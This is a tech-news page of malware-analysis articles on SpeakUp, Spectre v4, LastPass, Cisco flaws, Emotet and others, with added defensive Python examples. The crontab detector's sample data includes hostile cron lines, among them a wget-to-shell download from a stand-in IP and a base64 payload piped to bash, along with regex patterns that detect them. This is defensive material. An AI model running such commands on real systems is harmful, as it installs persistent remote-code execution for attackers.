Tech News - Malware Analysis

32 Articles
Undetected Linux Backdoor ‘SpeakUp’ infects Linux, MacOS with cryptominers
Melisha Dsouza
05 Feb 2019
4 min read
Security researchers at Check Point Research have discovered a new backdoor trojan, dubbed ‘SpeakUp’, that exploits known vulnerabilities in six Linux distributions and can also infect macOS. The trojan is being used in a cryptomining campaign that has hit more than 70,000 servers worldwide so far: the attackers deploy Monero miners on infected servers and have earned around 107 Monero coins (roughly $4,500) to date. The backdoor was first spotted last month, and the researchers found a built-in Python script that lets it spread laterally through the local network. At the time of writing it is not detected by antivirus engines, it uses elaborate propagation tactics, and its potential targets include the servers behind the most popular sites on the internet.

What can this trojan do?

On an infected system the attackers can modify the local crontab to survive reboots, run arbitrary shell commands, execute files downloaded from a remote command and control (C&C) server, and update or uninstall the backdoor. According to the researchers, SpeakUp has been exploiting the same kind of Linux servers that run more than 90 percent of the top 1 million domains in the U.S. The initial infection vector is an exploit for the ThinkPHP framework; the researchers have not seen the attackers use anything other than ThinkPHP for the initial foothold.

For lateral movement the trojan scans the local network for open ports, brute-forces neighbouring systems with a list of predefined usernames and passwords, and takes over unpatched systems using one of these seven exploits:

CVE-2012-0874: JBoss Enterprise Application Platform multiple security bypass vulnerabilities
CVE-2010-1871: JBoss Seam Framework remote code execution
JBoss AS 3/4/5/6: remote command execution
CVE-2017-10271: Oracle WebLogic wls-wsat component deserialization RCE
CVE-2018-2894: vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware
Hadoop YARN ResourceManager: command execution
CVE-2016-3088: Apache ActiveMQ Fileserver file upload remote code execution

The researchers also point out that SpeakUp’s authors can download any code they want to the infected servers:

“SpeakUp’s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making. It is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.”

Speaking to Threatpost, Oded Vanunu, head of products vulnerability research at Check Point, said that “the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. Since these software can be deployed on virtual servers, all cloud infrastructure are also prone to be affected.” According to Check Point’s analysis, the malware is currently being distributed mainly to Linux servers located in China.

Lotem Finkelstein, one of the Check Point researchers, told ZDNet that “the infections in non-Chinese countries comes from SpeakUp using its second-stage exploits to infect companies' internal networks, which resulted in the trojan spreading outside the normal geographical area of a Chinese-only PHP framework.”

Head over to the Check Point Research post for a breakdown of how the trojan works and an analysis of its impact.
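Cron-based persistence of the kind described above (a scheduled job that fetches and runs a remote script, or that runs a payload dropped in a world-writable directory) is cheap to hunt for on a server. The following is an added example, not Check Point's tooling or a published SpeakUp signature: it parses crontab text and flags entries matching a few generic download-and-execute indicators. The indicators are this example's assumptions and the sample crontab is constructed.

```python
"""Flag crontab entries that look like download-and-execute persistence.
Added example; the indicator patterns are assumptions, not a vendor signature."""
import re

# Constructed sample: two ordinary jobs plus three suspicious entries.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * wget -q -O- http://203.0.113.7/x.sh | sh
@reboot /tmp/.X11/speakup.py
17 * * * * echo ZWNobyBwd25lZA== | base64 -d | bash
30 2 * * 0 /usr/local/bin/backup.sh
"""

# (regex, reason) pairs evaluated against "<schedule> <command>".
SUSPICIOUS = [
    (r"\b(wget|curl)\b[^|;&]*\|\s*(sh|bash|python\d?)\b", "remote script piped to interpreter"),
    (r"\bbase64\s+(-d|--decode)\b", "base64-decoded payload"),
    (r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+", "executable under world-writable dir"),
    (r"^@reboot\b", "runs at every boot"),
]


def parse_crontab(text):
    """Return (line_no, schedule, command) for every non-comment crontab entry."""
    entries = []
    for no, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if s.startswith("@"):                      # @reboot, @daily, ...
            sched, _, cmd = s.partition(" ")
        else:                                      # five time fields + command
            parts = s.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        entries.append((no, sched, cmd))
    return entries


def suspicious_entries(text):
    """Return (line_no, command, [reasons]) for entries matching any indicator."""
    hits = []
    for no, sched, cmd in parse_crontab(text):
        full = f"{sched} {cmd}"
        reasons = [why for pat, why in SUSPICIOUS if re.search(pat, full)]
        if reasons:
            hits.append((no, cmd, reasons))
    return hits


if __name__ == "__main__":
    # On a live host: run against `crontab -l -u <user>` output or /etc/cron.d/* files.
    for no, cmd, reasons in suspicious_entries(SAMPLE_CRONTAB):
        print(f"line {no}: {cmd}\n    {'; '.join(reasons)}")
```

On a real host, feed it the output of `crontab -l` for every user plus the files under /etc/cron.d, and treat any hit as a lead to verify by hand rather than as a verdict.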

Intel's Spectre variant 4 patch impacts CPU performance
Vijin Boricha
31 May 2018
3 min read
Intel recently announced its fix for the Spectre variant 4 attack, together with figures showing that the mitigation noticeably reduces CPU performance. Anticipating questions, Intel published performance numbers for the combined software and firmware (microcode) updates that mitigate variant 4.

Discovered by Jann Horn of Google Project Zero and Ken Johnson of Microsoft, Spectre variant 4 is a speculative store bypass: the CPU may speculatively execute a load before an earlier store to the same address has completed, so the load observes the stale value. An attacker can leverage this to read older memory values in a CPU’s stack or other memory locations, which allows less privileged code to read data it should not have access to and to run older commands speculatively, leaving traces in the cache that can be read through a side channel.

Intel calls its mitigation Speculative Store Bypass Disable (SSBD) and delivers it as a microcode update to appliance manufacturers, operating system vendors and other ecosystem partners. According to Intel, the mitigation is ‘off’ by default; when it is enabled, Intel has observed a performance impact of roughly 2% to 8%, depending on the benchmark (SPECint, SYSmark 2014 SE and others).

Back in January, Intel was less forthcoming about the CPU performance impact of the Spectre variant 2 mitigation and waved off such concerns by saying that the performance would vary depending on the workload. Google pushed back, stating that the impact was severe, and ended up developing its own software alternative, Retpoline.

Intel recently measured the impact of SSBD on unspecified Intel reference hardware with an 8th Gen Intel Core desktop processor. The impact on the overall benchmark scores was:

SYSmark 2014 SE: 4%
SPECint_rate_base2006 (n copy): 2%
SPECint_rate_base2006 (1 copy): 8%

Intel reports similar results on a Skylake-architecture Xeon processor.

Intel has clearly stated that the mitigation will be set to ‘off’ by default, leaving customers the choice to enable it, since Intel expects most industry software partners to keep the default to avoid the performance loss. Intel also noted that SSBD adds an extra layer of protection for consumer and original equipment manufacturer hardware by preventing speculative store bypass, and that the browser mitigations already deployed against Spectre variant 1 also help to an extent against variant 4. More on the latest security updates for Intel products is available from the Intel security center.
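The ‘off by default, opt in if you need it’ choice described above is exactly what Linux exposes: the kernel reports the SSB state in sysfs and lets a process opt itself into SSBD with prctl(2). The following is an added example, not Intel's or the article's code. It assumes a Linux kernel with speculation control (4.17 or later) and glibc's prctl; the constants are those of <linux/prctl.h>, and the sysfs strings used for checking are constructed. On other systems the two prctl helpers simply fail.

```python
"""Report the kernel's Speculative Store Bypass state and opt this process into SSBD.
Added example; prctl constants from <linux/prctl.h> (Linux 4.17+)."""
import ctypes

SYSFS_SSB = "/sys/devices/system/cpu/vulnerabilities/spec_store_bypass"

PR_GET_SPECULATION_CTRL = 52
PR_SET_SPECULATION_CTRL = 53
PR_SPEC_STORE_BYPASS = 0
PR_SPEC_PRCTL = 1 << 0          # mitigation is controllable per task
PR_SPEC_ENABLE = 1 << 1         # speculation enabled (SSBD off for this task)
PR_SPEC_DISABLE = 1 << 2        # speculation disabled (SSBD on for this task)
PR_SPEC_FORCE_DISABLE = 1 << 3  # disabled and cannot be re-enabled


def classify_sysfs(text):
    """Map the sysfs line to (state, opt_in_via_prctl)."""
    t = text.strip()
    if t == "Not affected":
        return "not_affected", False
    if t.startswith("Vulnerable"):
        return "vulnerable", False
    if t.startswith("Mitigation:"):
        # e.g. "Mitigation: Speculative Store Bypass disabled via prctl and seccomp"
        return "mitigated", "prctl" in t
    return "unknown", False


def describe_mode(bits):
    """Turn a PR_GET_SPECULATION_CTRL result into a short description."""
    if bits is None:
        return "prctl speculation control not supported"
    if bits == 0:
        return "not affected"
    parts = []
    if bits & PR_SPEC_DISABLE:
        parts.append("SSBD on")
    elif bits & PR_SPEC_ENABLE:
        parts.append("SSBD off")
    if bits & PR_SPEC_PRCTL:
        parts.append("controllable via prctl")
    if bits & PR_SPEC_FORCE_DISABLE:
        parts.append("forced, cannot be re-enabled")
    return ", ".join(parts) or "unknown (%#x)" % bits


def _prctl(option, arg2, arg3):
    """Call glibc's variadic prctl(); returns the raw result (-1 on error)."""
    libc = ctypes.CDLL(None, use_errno=True)
    libc.prctl.restype = ctypes.c_int
    return libc.prctl(ctypes.c_int(option), ctypes.c_ulong(arg2),
                      ctypes.c_ulong(arg3), ctypes.c_ulong(0), ctypes.c_ulong(0))


def current_ssb_mode():
    """Raw kernel answer for this task, or None if the kernel lacks support."""
    r = _prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS, 0)
    return None if r < 0 else r


def enable_ssbd():
    """Opt this process (and its children) into SSBD. True on success."""
    return _prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS, PR_SPEC_DISABLE) == 0


if __name__ == "__main__":
    try:
        with open(SYSFS_SSB) as f:
            print("kernel:", classify_sysfs(f.read()))
    except OSError:
        print("kernel: sysfs entry not present")
    print("before:", describe_mode(current_ssb_mode()))
    print("enable_ssbd:", enable_ssbd())
    print("after:", describe_mode(current_ssb_mode()))
```

A process that handles untrusted input (a sandbox, a JIT, a browser renderer) is the natural candidate for the opt-in; the performance cost quoted above is then paid only by that process rather than system-wide.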

LastPass patched a security vulnerability from the extensions generated on pop-up windows
Amrata Joshi
18 Sep 2019
3 min read
Last week, the team behind the LastPass password manager released an update to patch a security vulnerability that exposed credentials the user had entered on a previously visited site. The bug let a website steal the credentials for the last account the user had logged into through the LastPass Chrome or Opera extension. Tavis Ormandy, a security researcher at Google’s Project Zero, discovered the bug last month.

The security vulnerability came from extension pop-up windows

On the Google Project Zero issue page, Ormandy explained that the flaw lay in how the extension’s pop-up windows were created. A website could produce a pop-up by creating an HTML iframe pointing at the extension’s popupfilltab.html page, instead of the extension opening it through its do_popupregister() function. When a pop-up was opened this way, it was filled with the password for the most recently visited site.

https://twitter.com/taviso/status/1173401754257375232

According to Ormandy, an attacker could hide the malicious link behind a Google Translate URL, lure the user into visiting it, and then extract credentials from a previously visited site. The Project Zero report reads, "Because do_popupregister() is never called, ftd_get_frameparenturl() just uses the last cached value in g_popup_url_by_tabid for the current tab. That means via some clickjacking, you can leak the credentials for the previous site logged in for the current tab."

LastPass patched the reported issue in version 4.33.0, released on 12th September. According to the official blog post, the bug affects its Chrome and Opera browser extensions. The bug is considered dangerous because it is triggered by malicious JavaScript on a page the user visits, with clickjacking supplying the clicks it needs.

Ormandy added, “I think it’s fair to call this “High” severity, even if it won’t work for *all* URLs.” Ferenc Kun, security engineering manager at LastPass, said in an online statement that this "limited set of circumstances on specific browser extensions" could potentially enable the attack scenario described. Kun added, "To exploit this bug, a series of actions would need to be taken by a LastPass user including filling a password with the LastPass icon, then visiting a compromised or malicious site and finally being tricked into clicking on the page several times."

LastPass recommends general security practices

The LastPass team shared the following list of general security practices:

Beware of phishing attacks; do not click on links from untrusted contacts and companies.
Enable MFA for LastPass and for other services such as email, banking, Twitter and Facebook. Additional layers of authentication are the most effective way to protect an account.
Do not reuse or disclose the LastPass master password.
Use a unique password for every online account, run antivirus with the latest detection patterns, and keep software up to date.

To know more, check out the official post.

Cisco reports critical vulnerabilities in Nexus 9000 data center switches, PI software, and EPN manager
Savia Lobo
17 May 2019
3 min read
Earlier this month, Cisco announced a critical vulnerability in its Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch Software that allows an unauthenticated, remote attacker to connect to an affected system with the privileges of the root user. The vulnerability is only exploitable over IPv6; IPv4 is not affected. Cisco has released free software updates that address it.

The vulnerability (CVE-2019-1804), with a CVSS severity rating of 9.8, is due to a default SSH key pair that is present in all devices. An attacker who extracts the key material could exploit the vulnerability by opening an SSH connection to a targeted device over IPv6 using that key. There are no workarounds, so Cisco is encouraging users to update to the latest software release; Cisco notes, however, that the fix is only an interim patch.

The company also issued a “high” severity advisory for the Nexus 9000 for a bug that allows an attacker to execute arbitrary operating-system commands as root on an affected device. To succeed, an attacker would need valid administrator credentials for the device, Cisco said. The vulnerability is due to overly broad system-file permissions: an attacker could exploit it by authenticating to an affected device, creating a crafted command string and writing it to a specific file location.

Critical vulnerabilities in Cisco’s web-based management interfaces

Multiple critical vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager were disclosed yesterday. They could allow a remote attacker to execute arbitrary code with elevated privileges on the underlying operating system. These vulnerabilities affect Cisco PI Software Releases prior to 3.4.1, 3.5, and 3.6, and EPN Manager Releases prior to 3.0.1.

One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker with network access to the affected administrative interface. For the second and third issues (CVE-2019-1822 and CVE-2019-1823), the attacker needs valid credentials to authenticate to the affected administrative interface. Cisco has released software updates that address these vulnerabilities; there are no workarounds. To know more about these and other vulnerabilities, visit Cisco’s Security Advisories and Alerts page.
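A default key pair baked into every unit shows up from the outside as the same SSH host key on many devices, so the check a defender can run without vendor tooling is to scan the fleet and look for host-key fingerprints shared across hosts. The following is an added example, not Cisco's code: it parses ssh-keyscan style output, computes OpenSSH-style SHA256 fingerprints and groups hosts by key. The scan lines are constructed and the "keys" are placeholder blobs, not real key material.

```python
"""Find SSH host keys presented by more than one device.
Added example; scan output is constructed and the key blobs are placeholders."""
import base64
import hashlib
from collections import defaultdict


def _fake_key(label):
    # Placeholder blob standing in for a real SSH public key.
    return base64.b64encode(b"placeholder-hostkey-" + label.encode()).decode()


KEY_SHARED = _fake_key("vendor-default")
KEY_UNIQUE = _fake_key("device-D")

# Constructed output in `ssh-keyscan -t rsa` format ("host keytype base64key",
# comment lines start with '#'). Three devices present the same key.
SCAN_OUTPUT = f"""\
# 192.0.2.10:22 SSH-2.0-Cisco-1.25
192.0.2.10 ssh-rsa {KEY_SHARED}
# 192.0.2.11:22 SSH-2.0-Cisco-1.25
192.0.2.11 ssh-rsa {KEY_SHARED}
192.0.2.12 ssh-rsa {KEY_SHARED}
192.0.2.13 ssh-rsa {KEY_UNIQUE}
"""


def parse_keyscan(text):
    """Yield (host, keytype, base64_key) from ssh-keyscan output, skipping comments."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, ktype, rest = line.split(None, 2)
        yield host, ktype, rest.split()[0]


def fingerprint(b64_key):
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of SHA-256(key blob)."""
    digest = hashlib.sha256(base64.b64decode(b64_key)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def shared_keys(text):
    """Map fingerprint -> hosts for every key seen on more than one host."""
    hosts_by_fp = defaultdict(list)
    for host, _ktype, key in parse_keyscan(text):
        hosts_by_fp[fingerprint(key)].append(host)
    return {fp: hosts for fp, hosts in hosts_by_fp.items() if len(hosts) > 1}


if __name__ == "__main__":
    # On a real network: ssh-keyscan -t rsa,ecdsa,ed25519 -f hosts.txt > scan.txt
    for fp, hosts in shared_keys(SCAN_OUTPUT).items():
        print(f"{fp} shared by {len(hosts)} hosts: {', '.join(hosts)}")
```

Shared host keys are not always a default key (a cloned VM image causes the same symptom), but in either case the key is not unique to the device and should be regenerated.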

Machine learning based Email-sec-360° surpasses 60 antivirus engines in detecting malicious emails
Savia Lobo
20 Jul 2018
3 min read
E-mail is the traditional, primary and most vital channel of communication within business organizations. Mailboxes hold minutes of important discussions, confidential documents as attachments, high-profile business contact details and much more, so attackers often use email to deliver dangerous content to a victim, either as attachments or as links to malicious websites. Companies invest heavily in detecting malicious content in their communication channels by deploying antivirus gateways. But how good are they? Many choose antivirus engines on popularity rather than performance, and the assumption that the best-known antivirus package gives the best protection is now challenged by Email-sec-360°, which, according to Phys Org, outperforms 60 popular antivirus engines.

Email-sec-360° was developed by Aviad Cohen, a Ph.D. student and researcher at the Ben-Gurion University of the Negev (BGU) Malware Lab. It detects unknown malicious emails much more accurately than popular antivirus products such as Kaspersky, McAfee and Avast.

Email-sec-360° vs other popular antivirus engines

Existing antivirus engines use rule-based methods that analyze specific sections of an email and often overlook other important parts. Dr. Nir Nissim, head of the David and Janet Polak Family Malware Lab at Cyber@BGU, stated that existing engines rely on signature-based detection, which is often insufficient for detecting new and unknown malicious emails. Email-sec-360°, by contrast, is based on machine learning and leverages 100 general descriptive features extracted from all email components: the header, the body and the attachments. The method does not require internet access, so it provides real-time threat detection and can be deployed by any individual or organization.

A well-tested approach by the Malware Lab

The researchers used a collection of 33,142 emails, 12,835 malicious and 20,307 benign, obtained between 2013 and 2016, and compared their detection model to 60 industry-leading antivirus engines as well as to previous research. Their system outperformed the next best antivirus engine, Cyren, by 13 percent.

BGU’s Malware Lab method vs the others

BGU Malware Lab plans to extend the method by adding analysis of attachments (PDFs and Microsoft Office documents) to Email-sec-360°, “since these are often used by hackers to get users to open and propagate viruses and malware,” Dr. Nissim adds. They are also planning an online system that evaluates the security risk posed by an email message. Based on advanced machine learning methods, it would let users submit suspicious email messages and quickly obtain a maliciousness score, recommend how to treat the email, and help collect benign and malicious emails for research purposes. Read more about Email-sec-360° in the Phys Org blog post.
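The feature-based approach described above, extracting descriptive features from the header, the body and the attachments rather than matching signatures against one part, can be illustrated with a small extractor. The following is an added example, not Email-sec-360°'s code, and its ten features are this example's own choices rather than the 100 used by the BGU researchers; the message it parses is constructed with the traits a phishing classifier would care about (mismatched Reply-To, an IP-literal link, an HTML body, a macro-enabled attachment).

```python
"""Extract simple descriptive features from every part of an email.
Added example; the feature set is illustrative and the message is constructed."""
import email
import re
from email import policy
from email.utils import parseaddr

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
IP_URL_RE = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)")
RISKY_EXT = (".exe", ".scr", ".js", ".vbs", ".hta", ".jar", ".docm", ".xlsm")

SAMPLE_EMAIL = b"""\
Received: from mail.example.net (mail.example.net [198.51.100.5])
Received: from [203.0.113.9] (unknown [203.0.113.9])
From: "Accounts" <billing@example.net>
Reply-To: payments@example.org
To: alice@example.com, bob@example.com
Subject: URGENT invoice overdue
Date: Mon, 16 Jul 2018 09:12:00 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body>Please review <a href="http://203.0.113.9/inv">the invoice</a>
or <a href="https://example.org/pay">pay here</a>.</body></html>
--b1
Content-Type: application/octet-stream; name="invoice.docm"
Content-Disposition: attachment; filename="invoice.docm"
Content-Transfer-Encoding: base64

UEsDBBQ=
--b1--
"""


def extract_features(raw):
    """Return a flat dict of header, body and attachment features for one message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    from_addr = parseaddr(msg.get("From", ""))[1]
    reply_to = parseaddr(msg.get("Reply-To", ""))[1]
    subject = msg.get("Subject", "")

    recipients = []
    for header in ("To", "Cc"):
        value = msg.get(header)
        if value:
            recipients.extend(a.addr_spec for a in value.addresses)

    body_text, attachments, html = [], [], False
    for part in msg.walk():                      # visits every MIME leaf
        if part.get_content_maintype() == "multipart":
            continue
        if part.get_content_disposition() == "attachment":
            attachments.append(part.get_filename() or "")
            continue
        if part.get_content_maintype() == "text":
            html = html or part.get_content_subtype() == "html"
            body_text.append(part.get_content())
    body = "\n".join(body_text)
    urls = URL_RE.findall(body)

    return {
        "received_hops": len(msg.get_all("Received", [])),
        "recipient_count": len(recipients),
        "subject_len": len(subject),
        "subject_has_urgent": "urgent" in subject.lower(),
        # Reply-To pointing at another domain than From is a classic phishing tell.
        "reply_to_mismatch": bool(reply_to) and reply_to.split("@")[-1] != from_addr.split("@")[-1],
        "html_body": html,
        "url_count": len(urls),
        "ip_url_count": sum(1 for u in urls if IP_URL_RE.match(u)),
        "attachment_count": len(attachments),
        "risky_attachment": any(a.lower().endswith(RISKY_EXT) for a in attachments),
    }


if __name__ == "__main__":
    for name, value in extract_features(SAMPLE_EMAIL).items():
        print(f"{name:20} {value}")
```

A feature vector like this, computed for every message in a labelled corpus, is what a classifier is trained on; none of the features depends on a lookup against an online reputation service, which is what allows detection to run offline.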

Google Calendar was down for nearly three hours after a major outage
Amrata Joshi
19 Jun 2019
2 min read
Yesterday, Google Calendar was down for nearly three hours around the world. Users trying to access the service saw a 404 error in their browsers from around 10 AM ET to 12:40 PM ET. Google updated the service details stating, “We're investigating reports of an issue with Google Calendar. We will provide more information shortly. The affected users are unable to access Google Calendar.” During the outage, other Google services including Gmail and Google Maps appeared to be unaffected, but Hangouts Meet reportedly experienced some issues.

While Calendar was down, many users expressed their concerns on Twitter. Here are a few of the reactions:

https://twitter.com/BestGaryEver/status/1141004879382700040
https://twitter.com/falcons3040/status/1141143090239090689
https://twitter.com/ola11king/status/1141012717144199169
https://twitter.com/thejacegoodwin/status/1140999161434689541
https://twitter.com/ChristinaAllDay/status/1140986268878286848

Others were irritated; a user commented on Hacker News, “I guess it's time for all the Google engineers to put their LeetCode skills to the test.” People also expected a quicker response from the company. Another comment reads, “Over an hour into the outage, still no word at all from Google on the status page apart from -We're investigating.”

Such outages keep happening: earlier this month, Google Cloud suffered a major outage that took down a number of Google services including YouTube, G Suite and Gmail, and also affected services that depend on Google, including Nest, Discord, Snapchat and Shopify. To know more, check out the service details published by Google.

Google open sources ClusterFuzz, a scalable fuzzing tool
Natasha Mathur
08 Feb 2019
2 min read
Google made its scalable fuzzing tool, ClusterFuzz, available as open source yesterday. Google uses ClusterFuzz to fuzz the Chrome browser; fuzzing is a technique that finds bugs in software by feeding unexpected inputs to a target program. For fuzzing to be effective it should be continuous, done at scale, and integrated into the development process of a software project.

ClusterFuzz can run on clusters of over 25,000 machines and surfaces security and stability issues in software. It serves as the fuzzing backend for OSS-Fuzz, a service Google released back in 2016. ClusterFuzz was previously available to open source projects only as a free service through OSS-Fuzz, but is now available for anyone to use.

ClusterFuzz comes with a variety of features that help integrate fuzzing into a project’s development process. Some of the key features:

Accurate deduplication of crashes.
Fully automatic bug filing and closing for issue trackers.
Statistics for analyzing fuzzer performance and crash rates.
An easy-to-use web interface for management and for viewing crashes.

ClusterFuzz has so far found more than 16,000 bugs in Chrome and over 11,000 bugs in more than 160 open source projects integrated with OSS-Fuzz. It can detect bugs within hours of their introduction and verify a fix within a day.

“We developed ClusterFuzz over eight years to fit seamlessly into developer workflows, and to make it dead simple to find bugs and get them fixed. Through open sourcing ClusterFuzz, we hope to encourage all software developers to integrate fuzzing into their workflows,” state the ClusterFuzz team members. For more information, check out ClusterFuzz’s official GitHub repository.
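Crash deduplication, the first feature listed above, is what keeps a fuzzer running at scale from filing the same bug thousands of times: two reports belong to the same bug when their crash type and their topmost meaningful stack frames match, regardless of pid, addresses or run. The following is an added example, not ClusterFuzz's own algorithm: the frame-skipping rules (sanitizer interceptors, libc start-up, the fuzz harness entry point) and the three-frame depth are this example's assumptions, and the three AddressSanitizer reports are constructed.

```python
"""Group sanitizer crash reports by a stack-based crash signature.
Added example; skip rules and depth are assumptions, reports are constructed."""
import re
from collections import defaultdict

CRASH_TYPE_RE = re.compile(r"ERROR: \w+Sanitizer: ([\w-]+)")
PID_RE = re.compile(r"^==(\d+)==", re.M)
FRAME_RE = re.compile(r"^\s*#\d+\s+0x[0-9a-fA-F]+\s+in\s+(\S+)", re.M)

# Frames that belong to the runtime or the harness, not to the bug.
SKIP_PREFIXES = ("__interceptor_", "__asan_", "__sanitizer_", "__libc_")
SKIP_EXACT = {"main", "_start", "LLVMFuzzerTestOneInput"}
DEPTH = 3  # frames kept in the signature

REPORT_A = """\
==1234==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000014 at pc 0x4a1b2b
READ of size 1 at 0x602000000014 thread T0
    #0 0x4a1b2b in parse_header parser.c:42:12
    #1 0x4a2c3d in parse_packet parser.c:88:5
    #2 0x4a3e4f in LLVMFuzzerTestOneInput fuzz_target.c:12:3
    #3 0x7f1e2a0b in __libc_start_main (libc.so.6+0x2409b)
"""
# Same bug from another run: different pid and addresses, same frames.
REPORT_B = """\
==1299==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000e034 at pc 0x4a1b2b
READ of size 1 at 0x60200000e034 thread T0
    #0 0x4a1b2b in parse_header parser.c:42:12
    #1 0x4a2c3d in parse_packet parser.c:88:5
    #2 0x4a3e4f in LLVMFuzzerTestOneInput fuzz_target.c:12:3
    #3 0x7f1e2a0b in __libc_start_main (libc.so.6+0x2409b)
"""
# A different bug whose top frame is a sanitizer interceptor.
REPORT_C = """\
==1300==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300000eff0 at pc 0x4b0010
READ of size 4 at 0x60300000eff0 thread T0
    #0 0x4b0010 in __interceptor_memcpy (a.out+0x4b0010)
    #1 0x4a9c1d in copy_body parser.c:133:5
    #2 0x4a2c3d in parse_packet parser.c:91:5
    #3 0x4a3e4f in LLVMFuzzerTestOneInput fuzz_target.c:12:3
"""


def crash_key(report):
    """(crash type, up to DEPTH meaningful function names) identifying the bug."""
    m = CRASH_TYPE_RE.search(report)
    crash_type = m.group(1) if m else "unknown"
    frames = []
    for func in FRAME_RE.findall(report):
        if func.startswith(SKIP_PREFIXES) or func in SKIP_EXACT:
            continue
        frames.append(func)
        if len(frames) == DEPTH:
            break
    return crash_type, tuple(frames)


def dedupe(reports):
    """Map crash key -> pids of the reports that share it."""
    groups = defaultdict(list)
    for report in reports:
        m = PID_RE.search(report)
        groups[crash_key(report)].append(m.group(1) if m else "?")
    return dict(groups)


if __name__ == "__main__":
    for key, pids in dedupe([REPORT_A, REPORT_B, REPORT_C]).items():
        print(key, "->", pids)
```

Keying on symbolized function names rather than addresses is what makes the signature stable across builds; the depth is a trade-off, since too few frames merge distinct bugs that share a top frame and too many split one bug that is reached by several call paths.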

Emotet, a dangerous botnet spams malicious emails, “targets 66,000 unique emails for more than 30,000 domain names” reports BleepingComputer
Vincy Davis
19 Sep 2019
4 min read
Three days ago, the dangerous Emotet malware botnet resumed sending malicious emails to many countries around the globe. The first emails carrying Emotet’s signature were spotted on the morning of September 16th in Germany, the United Kingdom, Poland, Italy and the U.S.A., targeting individuals, businesses and government entities. This is not Emotet’s first outing: it was first seen as a banking trojan in 2014.

https://twitter.com/MalwareTechBlog/status/1173517787597172741

Anyone who unknowingly downloaded and executed the attachment of an infected mail may have exposed themselves to the Emotet malware. Once infected, the computer is added to the Emotet botnet, which uses it as a downloader for other threats. The Emotet botnet was able to compromise many websites, including customernoble.com, taxolabs.com, www.mutlukadinlarakademisi.com and more.

In a statement to BleepingComputer, security researchers from email security company Cofense Labs said, “Emotet is now targeting almost 66,000 unique emails for more than 30,000 domain names from 385 unique top-level domains (TLDs).” The malicious emails are suspected to originate from “3,362 different senders, whose credentials had been stolen. The count for the total number of unique domains reached 1,875, covering a little over 400 TLDs.”

Brad Duncan, a security researcher, also reported that some U.S.-based hosts received Trickbot, a banking trojan turned malware dropper, as a secondary infection dropped by Emotet.

https://twitter.com/malware_traffic/status/1173694224572792834

What did the Emotet botnet do in its last outing?

According to BleepingComputer, the command and control (C2) servers for the Emotet botnet became active at the beginning of June 2019 but did not send any instructions to infected machines until August 22. Presumably, the botnet was taking time to rebuild, establish new distribution channels and prepare new spam campaigns; in short, it was under maintenance. Benkøw, a security researcher, had posted a list of the stages the botnet goes through to resume malicious activity.

https://twitter.com/benkow_/status/1164899159431946240

Emotet’s return therefore came as no surprise to security researchers, who expected the botnet to revive sooner or later.

How does the Emotet botnet function?

Discovered in 2014, Emotet was originally designed as a banking trojan that targeted mostly German and Austrian bank customers by stealing their login credentials. Over time it has evolved into a versatile and effective malware platform. Once a device is infected, Emotet tries to penetrate the other systems on the network via brute-force attacks. It can steal a user’s financial data, browsing history, saved passwords and Bitcoin wallets, and the infected machines can be used for DDoS attacks or to send out spam emails. The infected machine contacts Emotet’s command and control (C&C) servers to receive updates, and the C&C servers also serve as a dump for the stolen data. Per Cyren, a single Emotet bot can send a few hundred thousand emails in one hour, so it is capable of sending a few million emails a day. Emotet delivers modules that extract passwords from local applications and then spreads laterally to other computers on the same network. It can also steal entire email threads for later reuse in spam campaigns. Emotet also offers Malware-as-a-Service (MaaS): other malware groups rent access to Emotet-infected computers.

Meanwhile, many people on Twitter are sharing details about Emotet for others to watch out for.

https://twitter.com/BenAylett/status/1174560327649746944
https://twitter.com/papa_anniekey/status/1173763993325826049
https://twitter.com/evanderburg/status/1174073569254395904

Interested readers can check out the malware security analysis report for more information, and head over to BleepingComputer for more details.

Privilege escalation: Entry point for malware via program errors
Savia Lobo
14 Oct 2018
2 min read
Malware, or malicious software, is designed to harm a user’s computer system in multiple ways. Over the years, attackers have used many methods to plant viruses, worms, Trojans and spyware and bring a computer system down. To combat current-generation malware, you must know how malware functions and what techniques attackers use to launch it on a system. Some advanced malware techniques include:

Privilege escalation is how malware attempts to increase its reach within the system.
Persistence methods keep malware running for a longer time.
Data encoding explores ways to hide the intent of the malware.
Covert launching techniques launch malware in the stealthiest manner.

Of these four, privilege escalation is the one where malware exploits programming errors or design flaws to obtain permissions it was never granted. Through such flaws, the attacker can gain direct access to the network and its associated data and applications.

Watch the video below by Munir Njenga to learn all about privilege escalation and its types in depth, using real-world examples.

https://www.youtube.com/watch?v=Qzlkw5sJUsw

About Munir Njenga

Munir is a technology enthusiast, cybersecurity consultant and researcher. His skills and competencies stem from his active involvement in engagements that deliver advisory services such as network security reviews, security course development, training and capacity building, mobile and internet banking security reviews (BSS, MSC, HLR/AUC, IN, NGN, GGSN/SGSN), web applications, and network attack and penetration testing.

